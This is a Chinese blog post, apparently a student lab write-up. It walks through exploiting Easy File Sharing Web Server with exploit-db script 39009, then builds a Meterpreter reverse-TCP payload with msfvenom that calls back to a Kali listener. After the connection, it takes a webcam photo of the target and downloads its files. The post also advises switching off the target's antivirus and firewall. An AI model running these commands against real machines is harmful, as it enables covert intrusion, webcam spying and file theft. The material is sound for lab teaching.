easy flie漏洞与metasploit被控生成

已于 2022-03-19 15:11:46 修改
阅读量3.4k 收藏 1
点赞数 1
文章标签: 安全 web安全
于 2021-11-22 22:52:07 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53099802/article/details/121467735
版权

easy flie sharing server漏洞的应用

首先,将easy file sharing server放入靶机(通过文件共享放入)

打开它

配置8000端口

watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBA5omY54mp6KiA5b-X,size_20,color_FFFFFF,t_70,g_se,x_16

 在kali中输入 ,可观察到可用脚本,39009

searchsploit Easy File Sharing Web Server

watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBA5omY54mp6KiA5b-X,size_20,color_FFFFFF,t_70,g_se,x_16

 再输入

python /usr/share/exploitdb/exploits/windows/remote/39009.py 开放服务的靶机的ip(被控端) 8000

watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBA5omY54mp6KiA5b-X,size_20,color_FFFFFF,t_70,g_se,x_16

 

最后观察到,靶机弹出了计算器,并且easy file软件崩溃闪退;

watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBA5omY54mp6KiA5b-X,size_12,color_FFFFFF,t_70,g_se,x_16

 

二:Metasploit生成被控端程序与启动主控端

进入kali,输入 msfvenom -p windows/meterpreter/reverse_tcp lhost=  kali主机ip   lport=5000 -f exe -o /root/payload.exe

注:若找不到payload可用把后面改成 /home/kali/Desktop/payload.exe

直接生成程序在桌面

再把该程序放于被控的window中(要关闭电脑杀毒软件和防火墙,不然会被查杀删掉)

 

 

watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBA5omY54mp6KiA5b-X,size_20,color_FFFFFF,t_70,g_se,x_16

 注:若打开过多payload,可进入任务处理器停止运行这两个程序,不然会非常卡。

 

再次回到kali,

输入 msfconsole ,进入Metasploit

再输入 use exploit/multi/handler 使用handler作为主控端

输入 set  payload windows/meterpreter/reverse_tcp  (注意是reverse,课本的代码写少了r)装载上payload

输入options 查看配置情况

watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBA5omY54mp6KiA5b-X,size_20,color_FFFFFF,t_70,g_se,x_16

 输入 set lhost kali主机ip,主控主机kali

输入set lport 5000   控制端口链接 5000

watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBA5omY54mp6KiA5b-X,size_17,color_FFFFFF,t_70,g_se,x_16

最后输入 exploit

等待被控主机打开payload

打开后呈这样

watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBA5omY54mp6KiA5b-X,size_20,color_FFFFFF,t_70,g_se,x_16

 即进入了被控系统

尝试输入 webcam_snap 1  控制被控电脑摄像头,并排一张照片存放于/root文件中

watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBA5omY54mp6KiA5b-X,size_14,color_FFFFFF,t_70,g_se,x_16

watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBA5omY54mp6KiA5b-X,size_15,color_FFFFFF,t_70,g_se,x_16

 图片即为成功捕获被控摄像头排的照片

 

 

输入 ls 可获取被控端的桌面文件目录

watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBA5omY54mp6KiA5b-X,size_20,color_FFFFFF,t_70,g_se,x_16

 

download +文件名 可下载进kali  /root文件夹了

watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBA5omY54mp6KiA5b-X,size_20,color_FFFFFF,t_70,g_se,x_16

 

 

 

 

所以说,不要胡乱下载未知程序,容易被病毒入侵。

 

 

 

 

 

 

 

托物言志
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
FZEasyFile:在沙箱中创建、写入和删除文件的简单方法
06-06
FZEasy文件 在沙箱中创建、写入和删除文件的简单方法。 #它是什么? 直接用iOS的sdk来管理文件,很乏味,很枯燥,不可读。 FZEasyFile 提供了一种在沙箱中创建或覆盖文件的简单方法。 如果你想创建一个文件,你只需告诉 FZEasyFile 你的文件名,即“my/file/path/info.txt”。 您无需关心根目录是什么或目录“my/file/path/”是否存在。 实际上,沙箱中的根目录是“Documents”,如果“my/file/path”不存在,则会自动创建。 #Usage ###Import 源文件将“FZEasyFile.h”和“FZEasyFile.m”拖到您的项目中。 并在源文件中导入 .h 文件: # import " FZEasyFile.h " ###测试文件是否存在 [EasyFile isFileExists: @" my/file/
Metasploit应用
inskeyzh的博客
11-13 1959
一、准备 1.kali主机 2.Win7靶机 如未安装kali或Win7,可参考以下链接: Kali Linux 安装过程 超详细(图文并茂,通用版)_好好学习-CSDN博客_kali linux安装教程 史上最详细的虚拟机VMware12安装Windows7教程_威士忌荡出の忧伤的博客-CSDN博客_虚拟机安装win7 二、介绍 本次测试需要进行远程控制操作,要了解远程控制程序基础。 远程控制软件被控被控是需要在靶机上运行的,有点类似于木马,它可以是一段代码,也可以是个直接执行的程序
easy file sharing server 漏洞复现
qq_63016521的博客
11-24 508
easy file sharing server漏洞复现
Easy File Sharing Web Server 缓冲区溢出漏洞
qq_55857040的博客
12-14 1917
目录 漏洞介绍 环境准备 复现过程 一、环境搭建 二、漏洞利用 利用漏洞 利用metasploit进行漏洞利用 在kali打开msf控制台 ​ 输入命令,寻找找到EasyFileSharing漏洞的利用模块 小结 漏洞介绍 由于Easy File Sharing Web Server 6.9这个程序对输入的用户名长度不进行校验,存在缓冲区溢出漏洞,导致当用户输入太长的用户名导致缓冲区溢出,覆盖程序原本的返回地址,导致程序因跳转到非法地址奔溃或跳转到黑客控制的恶意代码地址进...
漏洞渗透测试
inskeyzh的博客
11-13 3230
一、准备 1.Win7靶机 2.kali虚拟机 3.efssetup_2018.exe 如未安装Win7靶机,可参考以下链接: ​​​​​​​史上最详细的虚拟机VMware12安装Windows7教程_威士忌荡出の忧伤的博客-CSDN博客_虚拟机安装win7 kali虚拟机安装可参考以下链接: Kali Linux 安装过程 超详细(图文并茂,通用版)_好好学习-CSDN博客_kali linux安装教程 efssetup_2018.exe下载: 链接:https://pan.baidu
最新IE 0day漏洞Metasploit生成方法.txt
03-18
最新IE 0day漏洞Metasploit生成方法.txt
教主Kali与Python黑客.2.漏洞发现与Metasploit
最新发布
10-14
教主Kali与Python黑客.2.漏洞发现与Metasploit
metasploit漏洞扫描器.txt
03-18
metasploit漏洞扫描器.txt
easy.file.sharing.web.server.v6.9.rar.7z
12-14
Easy File Sharing Web Server允许用户不需要任何附加的软件或服务就可以架设一个安全的、基于网页的P2P文件分享、传输系统。 除了HTML网页界面设计,Easy File Sharing Web Server还可以让你直接在自己的PC上快速架...
metasploit中使用lnk漏洞渗透测试.doc
03-18
metasploit中使用lnk漏洞渗透测试.doc
kali踩坑指北--searchsploit
weixin_43130853的博客
12-08 2165
一 ·参数介绍: -c, --case [Term] 区分大小写(默认不区分大小写) -e, --exact[Term] 对exploit标题进行EXACT匹配 (默认为 AND) [Implies "-t"]. -h, --help 显示帮助 -j, --json [Term] 以JSON格式显示结果 -m, --mirror [EDB-ID] 把一个exp拷贝到当前工作目录,参数后加目标id -o, --overflow [Term] Exploit标题被允许溢出其列 -p, --path
easy file sharing server 的漏洞利用
m0_56368726的博客
11-07 394
1、首先在winxp靶机上安装efssetup_2018.zip,并运行 2、扫描靶机进行的服务 使用nmap进行主动扫描,命令为nmap -sV 192.168.56.131。 可以看到靶机的80口提供的服务为easy file sharing server。 3、查找漏洞渗透模块 我们可以用“searchsploit"命令在kali中查找所需要的渗透模块。 我们这里以这个漏洞渗透模块为例,这个脚本使用python写的,利用溢出漏洞实现了在靶机执行计算器程序。 ...
easy file sharing server漏洞渗透测试及Metasploit应用
zzzfff__的博客
11-06 406
1、靶机(Windows)安装easy file sharing server(efssetup_2018.zip),该服务存在漏洞。 2、利用Nmap扫描发现靶机(Windows)运行了该服务。 3、利用该漏洞,使得靶机运行计算器。
kali攻击命令大全_利用msf攻击win10
热门推荐
weixin_35513543的博客
11-27 1万+
攻击环境:攻击者系统:虚拟机下kali linux靶机系统:win10(需要打开Easy File Sharing服务)攻击者ip:10.3.134.27靶机ip:10.3.37.56攻击者和靶机在同一个wifi下,保证在同一网段里,能互相ping通。漏洞利用:EsayFileSharing注意点: 攻击者的虚拟机网络模式应选择桥接模式。准备工作完成,可以开始内网渗透之旅了。step-1首先我们先...
渗透测试/应急演练过程中metasploit制作木马连接失败问题排查
weixin_40111182的博客
07-07 2963
声明:本文仅供学习交流,恶意人员请绕路, msf木马制作 网上有很多教程,比较简单,大致说下步骤: 1 生成木马 在kali控制台输入: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.10 LPORT=4444 -f exe >/home/kali/111.exe -p 参数后跟上payload(载体),攻击成功之后,要做什么事情 LHOST 后跟监听的IP,kali的ip LPORT 后跟监听
MSF后渗透操作
weixin_51583379的博客
11-03 1480
1.文件交互指令Linux权限理解chmod 777 {文件名.后缀}
MSF使用详解
m0_52051132的博客
10-19 7735
一、 Meterpreter是什么Meterpreter是Metasploit框架中的一个利器,作为漏洞溢出后的攻击载荷使用,攻击载荷在触发漏洞后会返回一个由我们控制的通道,可用于远程执行命令!Metasploit提供了各个主流平台的Meterpreter版本,包括Windows、Linux,同时支持x86、x64平台,另外,Meterpreter还提供了基于PHP和Java语言的实现。Meterpreter的工作模式是纯内存的,好处是启动隐藏,很难被杀毒软件监测到。
Easy File Sharing Web Server 缓冲区溢出漏洞利用
qq_42877870的博客
04-05 2193
Easy File Sharing Web Server 缓冲区溢出漏洞利用 1.首先我们先打开一台windows7系统的虚拟机,运行efssetup_2018并安装easy file sharing server 接着我们将easy file sharing web server的口改为8000,并按下Restart键 从easy file sharing web s...
metasploit漏洞
05-01
这些模块可以用于测试和评估系统的安全性,但也可以被攻击者用来利用系统漏洞进行攻击。 在Metasploit中,漏洞利用模块通常针对已知的漏洞进行开发,以便攻击者能够利用这些漏洞来获取系统访问权限或执行其他恶意...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值